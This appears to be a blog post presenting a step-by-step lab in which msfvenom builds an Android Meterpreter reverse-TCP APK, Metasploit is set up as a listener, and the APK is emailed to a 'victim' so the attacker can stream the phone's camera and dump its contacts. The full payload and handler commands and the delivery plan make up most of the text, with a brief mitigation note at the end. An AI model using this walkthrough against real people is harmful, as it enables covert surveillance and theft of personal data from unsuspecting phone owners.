We all have been told a rooted android phone is vulnerable. That brings me an additional question; “If an android phone is not-rooted, out-of-box condition, is it safe then?”
In the end of this posting, I’m gonna make a short story long and show you the answer to that question. If you are just looking for a short version of the answer; then the answer is “NO, it’s still not safe”
If you are trying to follow this step-by-step lab, you will need; 1. Kali Linux, 2. An Android phone, 3. The internet connection.
Step 1. Run “Terminal” in Kali and type
“msfvenom -p android/meterpreter/reverse_tcp LHOST=your_Kali_IP add LORT=4444 R > ~/Desktop/themitigators.apk“
‘your_Kali_IP’ is the IP address of your Kali linux. If you don’t know what’s your IP address, ‘ifconfig’ will tell you.
‘themitigators.apk’ can be any name.
If the command has been successfully executed, the .apk file(in this case, ‘themitigators.apk’) will be placed on the desktop
Step 2. Now, launch the Metasploit by typing “msfconsole”
If you can see the following screen, you are ready for Step3.
Step 3. Using the same terminal window, execute the following commands
3.1 use exploit/multi/handler
3.2 set payload android/meterpreter/reverse_tcp
3.3 set lhost your_Kali_IP
3.4 set lport 4444
Now the reverse TCP handler will be waiting for the victim to download/launch the payload ‘themitigators.apk‘
Step 4. Deliver the payload to the target. Let’s say, through email.
Step 5. Now the victim receives/opens the .apk (hopefully..)
Step 6. Once the victim has successfully installed/launch the .apk, the attacker will have a connection established.
Now let’s what can we do to this poor victim. First, let’s type ‘help’ to see the list of things we can do while this session is alive.
I’m already seeing some interesting keywords like; webcam_stream, dump_contact, wlan_geolocate and more.
Here are the result of each command I’d tried.
Streaming from rear camera was successful. Although the phone’s screen was locked, and the camera app wasn’t running, I was able to see whatever the same things the rear camera sees. However, depends on how busy your network is, the video might come up in 15~30 seconds or just simply be lagging a lot.
Dumping the contact list from the victim’s phone was successful. The dumped contact list automatically saved under home folder.
And the contact dump is displayed in well organized format.
Like all other form of reverse_tcp attack, the victim is the key. If user doesn’t download/run the .apk, the user will be safe. But, well, that’s not the case in real life. And obviously, this lab works with an android phone that’s never been rooted. So, “Do not rooting your phone” is not the answer to this as well.
One thing easily can be done to mitigate this type of attack will be disabling “Unknown Source” in settings/security menu.
Since ‘themitigators.apk’ was generated by msfconsole and was not downloaded from Play Store, by disabling “Unknown Sources”, the phone will prevent the .apk from running.
If you have an anti-malware protection on your phone, it would detect the apk file and shut down the connection to the attacker, even if the victim manually gives a go.